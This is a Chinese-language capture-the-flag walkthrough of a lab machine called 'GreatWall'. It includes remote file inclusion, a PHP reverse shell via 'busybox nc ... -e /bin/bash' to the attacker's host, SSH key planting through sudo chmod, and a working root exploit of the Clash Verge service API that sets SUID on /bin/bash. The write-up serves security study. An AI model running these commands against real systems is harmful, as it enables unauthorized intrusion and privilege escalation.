Temp-GreatWall-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.175  00:0c:29:94:3a:48       VMware, Inc.
192.168.60.254  00:50:56:ef:e4:ce       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.094 seconds (122.25 hosts/sec). 4 responded
❯ export ip=192.168.60.175
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.175:22
Open 192.168.60.175:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-11 20:56 CST
Initiating ARP Ping Scan at 20:56
Scanning 192.168.60.175 [1 port]
Completed ARP Ping Scan at 20:56, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:56
Completed Parallel DNS resolution of 1 host. at 20:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:56
Scanning 192.168.60.175 [2 ports]
Discovered open port 80/tcp on 192.168.60.175
Discovered open port 22/tcp on 192.168.60.175
Completed SYN Stealth Scan at 20:56, 0.09s elapsed (2 total ports)
Nmap scan report for 192.168.60.175
Host is up, received arp-response (0.00038s latency).
Scanned at 2025-05-11 20:56:12 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 00:0C:29:94:3A:48 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
           Raw packets sent: 3 (116B) | Rcvd: 20 (4.230KB)

目录枚举一下，只有一个index.php

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.175
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 3193]
Progress: 4811029 / 6369165 (75.54%)

浏览器访问一下

显示越过长城，走向世界的每一个角落。

哈哈哈🤣，国内GFW就是一个巨大的局域网

LFI/RFI 文件包含

猜测可能存在文件读取

得到wall用户

除此之外，还可以进行远程文件包含

❯ tail -f /var/log/nginx/access.log
192.168.60.175 - - [11/May/2025:21:54:36 +0800] "GET / HTTP/1.1" 200 2483 "-" "-"

创建php文件

❯ echo "<?php phpinfo() ?>"|sudo tee /var/www/html/a.php
<?php phpinfo() ?>

查看phpinfo信息，可以看到是允许在包含文件的时候使用 URL

很奇怪，明明是可以执行命令的，但就是弹不过来shell

我尝试ping一下kali，结果超时了，全部丢包

❯ cat /var/www/html/a.php
<?php
$exec = `ping -c 2 192.168.60.100`;
echo "返回结果：" . trim($exec);
?>

不过我尝试远程包含google的时候出现了个很有趣的回显

gulugulu哈哈哈，咖喱味浓郁

猜测大概率设置了iptables，不允许流量出站

使用原本就开放的22端口，利用此端口反弹shell

❯ cat /var/www/html/a.php
<?php
$exec = `busybox nc 192.168.60.100 22 -e /bin/bash`;
echo "返回结果：" . trim($exec);
?>
❯ curl -s "http://192.168.60.178/?page=http://192.168.60.100/a.php"

用户提权

监听端口，果然弹过来了😅

❯ penelope.py 22
[+] Listening for reverse shells on 0.0.0.0:22 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from greatwall-192.168.60.178-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/greatwall~192.168.60.178_Linux_x86_64/2025_05_11-23_14_55-664.log 📜
──────────────────────────────────────────────────────────────────────────
www-data@greatwall:~/html$

用户有sudo权限，可以执行chmod

直接将家目录改为777权限，即所有用户都可以读写执行

www-data@greatwall:/tmp$ sudo -l
Matching Defaults entries for www-data on greatwall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on greatwall:
    (wall) NOPASSWD: /bin/chmod
    
www-data@greatwall:/tmp$ sudo -u wall chmod -R 777 /home/wall/
www-data@greatwall:/tmp$ ls -al /home/wall/
total 32
drwxrwxrwx 4 wall wall 4096 May 11 02:41 .
drwxr-xr-x 3 root root 4096 May 10 18:54 ..
lrwxrwxrwx 1 root root    9 May 11 00:15 .bash_history -> /dev/null
-rwxrwxrwx 1 wall wall  220 May 10 18:54 .bash_logout
-rwxrwxrwx 1 wall wall 3526 May 10 18:54 .bashrc
drwxrwxrwx 3 wall wall 4096 May 11 00:18 .local
-rwxrwxrwx 1 wall wall  807 May 10 18:54 .profile
drwxrwxrwx 2 wall wall 4096 May 11 02:41 .ssh
-rwxrwxrwx 1 wall wall 1808 May 11 00:25 user.flag
www-data@greatwall:/tmp$ cd /home/wall/
www-data@greatwall:/home/wall$ cat user.flag
                                                          .'.
                                                      .':ldd.
                                                  .,:oddddd:
                                              .,cdddddddddd
                                          .,cddddddddddddd:
                                      .;lddddddddddddddddd.
                                  .;lddddddddddddddddddddl
                              .,cddddddddddddccoddddddddd.
                          .;cdddddddddddddl,.:ddddddddddc
                     .';lddddddddddddddo;. ,dddddddddddd.
                 .':lddddddddddddddddc.  'oddddddddddddc
             .':odddddddddddddddddl,   .cdddddddddddddd.
         .':oddddddddddddddddddd:.    ;dddddddddddddddo
      ';lddddddddddddddddddddl,     'odddddddddddddddd'
       ..,:lodddddddddddddo;.     .cdddddddddddddddddl
             ..';codddddc.      .:ddddddddddddddddddd.
                    ..'        ,ddddddddddddddddddddc
                              ;ldddddddddddddddddddd.
                                 ..';clddddddddddddc
                                        ..,:loddddd.
                             .c:,..           ..',:
                             'ddddd'
                             'dddl.
                             ,dd,
                             ;o.
                             .

flag{b088764475fa2a0a962fb9154f41c5b6}

尝试写个rev.sh，并且赋予其suid权限

然而不是隶属于wall的文件夹，没权限改

www-data@greatwall:/home/wall$ echo "busybox nc 192.168.60.100 22 -e /bin/bash">rev.sh
www-data@greatwall:/home/wall$ sudo -u wall chmod 6777 rev.sh
chmod: changing permissions of 'rev.sh': Operation not permitted

那还是走ssh这方案吧，写个公钥进去

www-data@greatwall:/home/wall/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmhumzHA2kpAF9W/XS9FK1CjvRlb1iP5kC8RhE/oyVaePE+eZudjlyvGyuJb1GDTad9Zi0hIW14bqdvfgU7HIYJKV1Y/goqs6BddT7KkYEs5643MxxErViGZP52hF3zggAi7Ho/BlnjRMPev1c1ZGzPbR+dpxd3mB6LUkiSEGwbXNOdmmleqmcZAkVEh7vi90/m1S9btqQpbbVRICGBQY6IHyl/PY6jX/W/38u/hhzj0u4poqqubOIWF2RA231osvqrG151Yeg3RYMJW89pK8D6f+Ma1h7sLE3VLlYe5kA2O0aKz0dgLK5KOshI08XhzpwBLKkpYlMRJ4U0KqJ04jhaF1P7o4Wa+hViAdKxOTBL5Y8RoFEGKVmhT9/pAel7BAmuBU0keGS3JaA5OltDBfbSHPPskdrUg/gWhbsjtt7Z+tTzTOSgl1gpQzHnTnfaMosF3WkwQrYq2sjcNEEmtRCF4Gyn92vD1MWfhepC0lGW3Z3o7AGt38ZuiH6/cR9LsjjIDqG90C2yxH4yNEbgW9/0qf6iD+ghDz9mBtzk0dJHMU6/GoxXTY1e+/bAlqDCF2NR+fogTm7DeGNJ9CuaxXF+laYa1wSeIKdMbdi+fmfwqVbiDxxmqbtqJVGmsbmoB1UYP+XZ74LcOPbsPoNzWo53P87a3U2620bIQx32yFPXw== Pepster@primary">authorized_keys

再把.ssh权限改回来

www-data@greatwall:/home/wall/.ssh$ sudo -u wall chmod 600 id_rsa
www-data@greatwall:/home/wall/.ssh$ sudo -u wall chmod 644 authorized_keys
www-data@greatwall:/home/wall/.ssh$ sudo -u wall chmod 644 id_rsa.pub
www-data@greatwall:/home/wall/.ssh$ cd ..
www-data@greatwall:/home/wall$ sudo -u wall chmod 700 .ssh/
www-data@greatwall:/home/wall$ sudo -u wall chmod 750 /home/wall/

Root 提权

尝试ssh登录一下

❯ ssh wall@$ip -i ../.ssh/id_rsa
Linux greatwall 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64

Last login: Sun May 11 03:48:42 2025 from 192.168.11.2
wall@greatwall:~$

得知用户wall也具有sudo权限

可以启动clash-verge-service

wall@greatwall:~$ sudo -l
Matching Defaults entries for wall on greatwall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User wall may run the following commands on greatwall:
    (ALL) NOPASSWD: /usr/bin/systemctl start clash-verge-service

哎，这不就是之前爆出来的clash漏洞吗

[BUG] Clash verge存在提权漏洞 · Issue #3428 · clash-verge-rev/clash-verge-rev

然而我找不到相关的POC利用，或者说复现步骤😅

不过就在今天修复了🤣

我尝试直接启动此服务，可以发现本地开放了33211端口

wall@greatwall:~$ sudo /usr/bin/systemctl start clash-verge-service
wall@greatwall:~$ ss -luntp
Netid         State          Recv-Q          Send-Q                   Local Address:Port                    Peer Address:Port         Process
udp           UNCONN         0               0                              0.0.0.0:68                           0.0.0.0:*
tcp           LISTEN         0               128                          127.0.0.1:33211                        0.0.0.0:*
tcp           LISTEN         0               128                            0.0.0.0:22                           0.0.0.0:*
tcp           LISTEN         0               128                               [::]:22                              [::]:*
tcp           LISTEN         0               511                                  *:80                                 *:*

我尝试查看帮助，然而并未没有图形化支持

wall@greatwall:~$ clash-verge --help

thread 'main' panicked at /home/runner/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/tao-0.32.8/src/platform_impl/linux/event_loop.rs:212:53:
Failed to initialize gtk backend!: BoolError { message: "Failed to initialize GTK", filename: "/home/runner/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/gtk-0.18.2/src/rt.rs", function: "gtk::rt::init", line: 141 }
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Aborted

尝试利用socat转发一下端口，结果没权限😅，忘了还有端口限制，只能80 22 端口出站

wall@greatwall:/tmp$ wget 192.168.60.100/socat
--2025-05-12 00:07:38--  http://192.168.60.100/socat
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat                                 100%[=======================================================================>] 366.38K  --.-KB/s    in 0.005s

2025-05-12 00:07:38 (68.3 MB/s) - ‘socat’ saved [375176/375176]

wall@greatwall:/tmp$ chmod +x socat
wall@greatwall:/tmp$ ./socat TCP-LISTEN:80,fork TCP4:127.0.0.1:33211
2025/05/12 00:10:18 socat[1622] E bind(5, {AF=2 0.0.0.0:80}, 16): Permission denied

我尝试利用此端口，代理访问一下本地的web服务

wall@greatwall:/tmp$ curl 127.0.0.1 --proxy 127.0.0.1:33211
HTTP method not allowed

访问一下kali的http服务，同样的也是方法不被允许

wall@greatwall:/tmp$ curl http://192.168.60.100 --proxy http://127.0.0.1:33211 -v
*   Trying 127.0.0.1:33211...
* Connected to 127.0.0.1 (127.0.0.1) port 33211 (#0)
> GET http://192.168.60.100/ HTTP/1.1
> Host: 192.168.60.100
> User-Agent: curl/7.88.1
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 405 Method Not Allowed
< content-type: text/plain; charset=utf-8
< content-length: 23
< date: Sun, 11 May 2025 16:19:20 GMT
<
* Connection #0 to host 127.0.0.1 left intact

nc连接一下

wall@greatwall:/tmp$ nc -vn 127.0.0.1 33211
(UNKNOWN) [127.0.0.1] 33211 (?) open
aaa
HTTP/1.1 400 Bad Request
content-length: 0
date: Sun, 11 May 2025 16:20:46 GMT

好在微信公众号中找到了相关利用POC

立即保护好Clash Verge rev！ 远程命令执行漏洞公开！

Clash verge 漏洞复现

我尝试构造以下POC即可实现提权

wall@greatwall:/tmp$ cat rev.sh
#!/bin/bash
chmod +s /bin/bash
wall@greatwall:/tmp$ curl -X POST http://127.0.0.1:33211/start_clash \
  -H "Content-Type: application/json" \
  -d '{
    "core_type": "verge-mihome",
    "bin_path": "/tmp/rev.sh",
    "config_dir": "1",
    "config_file": "/tmp/rev.sh",
    "log_file": "/tmp/abc"
  }'
{"code":0,"msg":"ok","data":null}
wall@greatwall:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Mar 30  2024 /bin/bash
wall@greatwall:/tmp$ bash -p
bash-5.2# id
uid=1000(wall) gid=1000(wall) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),1000(wall)
bash-5.2# whoami
root
bash-5.2# cat /root/r007.7x7oZzZzZzzzz
                       ,'.                    ,',
                      ,''',.                .,'',
                      ,''''''              .'''''.
                     .''''''''............''''''';
                     ;''''''''''''''''''''''''''''
                     ''''''''''''''''''''''''''''',
                    ....'''''''''''''''''''''''...,
                    ,.....;xkl'...........'dkd,.....
                    ,.....OMMM;...........cMMMd.....
                   .......'cl,.............;l:.....;
                   '.............':cc:,.............
                   ,.................................
                   .................................,
                  ...................................
                  ....................................
         ....     ,..................................'
        ...       ...................................,
        ,..      .....................................
        ...'     ......................................
          ....   '.....................................
             .........................................'

flag{b3d2a9f34869484b74db97411cf1eb3b}

后记

你可以查看其log，发现他会将命令拼接为以下格式

wall@greatwall:/tmp$ cat abc
Spawning process: /tmp/rev.sh -d 1 -f /tmp/rev.sh

所以其实你后面-d -f不用加参数也行

root@greatwall:/tmp# chmod -s /bin/bash
wall@greatwall:/tmp$ curl -X POST http://127.0.0.1:33211/start_clash \
  -H "Content-Type: application/json" \
  -d '{
    "core_type": "verge-mihome",
    "bin_path": "/tmp/rev.sh",
    "config_dir": "",
    "config_file": "",
    "log_file": "/tmp/abc"
  }'
{"code":0,"msg":"ok","data":null}wall@greatwall:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Mar 30  2024 /bin/bash
wall@greatwall:/tmp$ cat abc
Spawning process: /tmp/rev.sh -d  -f

不过靶机上并不存在iptables，已从 iptables 迁移到 nftables，但通过 netfilter-persistent 服务保留了 iptables 兼容性。

你可以看到iptables的相关配置文件

root@greatwall:/tmp# cat /etc/iptables/rules.v4
# Generated by iptables-save v1.8.9 (nf_tables) on Sun May 11 02:22:38 2025
*filter
:INPUT DROP [1:48]
:FORWARD DROP [0:0]
:OUTPUT DROP [4:176]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT
# Completed on Sun May 11 02:22:38 2025